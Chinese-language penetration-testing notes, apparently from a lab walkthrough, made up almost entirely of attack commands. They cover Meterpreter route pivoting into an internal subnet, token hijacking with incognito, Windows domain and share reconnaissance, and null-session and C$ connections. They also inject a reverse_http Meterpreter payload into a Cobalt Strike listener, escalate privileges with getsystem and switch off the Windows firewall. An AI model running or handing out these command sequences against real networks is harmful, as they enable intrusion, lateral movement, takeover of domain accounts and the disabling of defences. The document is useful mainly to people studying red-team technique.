Server: localhost via TCP/IP Software: MySQL Software version: 5.5.53 - MySQL Community Server (GPL) Protocol version: 10 User: root@localhost Server charset: UTF-8 Unicode (utf8)
meterpreter > run get_local_subnets [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Local subnet: 169.254.0.0/255.255.0.0 Local subnet: 192.168.52.0/255.255.255.0 Local subnet: 192.168.145.0/255.255.255.0
内网网段应该是192.168.52.0/24 添加前往 52网段的路由
1
run autoroute -s 192.168.52.0/24
查看添加后的路由
基本的使用
1 2 3 4 5 6 7 8 9 10 11 12
run autoroute -p –>查看域环境 use incognito –>调用劫持域管理模块 list_tokens -u –>查看当前目标主机的域环境信息 添加去往目标网段的转发路由 run autoroute –s <目标内网地址网段> run autoroute -s 0.0.0.0/0 添加到达0.0.0.0/0的路由 查看路由添加情况 run autoroute -p
ipconfig /all # 查看本机ip,所在域 route print # 打印路由信息 net view # 查看局域网内其他主机名 arp -a # 查看arp缓存 net start # 查看开启了哪些服务 net share # 查看开启了哪些共享 net share ipc$ # 开启ipc共享 net share c$ # 开启c盘共享 net use \\192.168.xx.xx\ipc$ "" /user:"" # 与192.168.xx.xx建立空连接 net use \\192.168.xx.xx\c$ "密码" /user:"用户名" # 建立c盘共享 dir \\192.168.xx.xx\c$\user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user # 查看本机用户列表 net user /domain # 查看域用户 net localgroup administrators # 查看本地管理员组(通常会有域用户) net view /domain # 查看有几个域 net user 用户名 /domain # 获取指定域用户的信息 net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作) net group 组名 /domain # 查看域中某工作组 net group "domain admins" /domain # 查看域管理员的名字 net group "domain computers" /domain # 查看域中的其他主机名 net group "doamin controllers" /domain # 查看域控制器(可能有多台)
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set lport 1235 #需要同CS监听端口一致 set session 1 #需要传入的session set DisablePayloadHandler true run
上线
就简单提权 getsystem 也可以或者使用插件CVE 提权
1 2
shell netsh firewall show state 查询防火墙状态 shell netsh advfirewall set allprofiles state off 关闭防火墙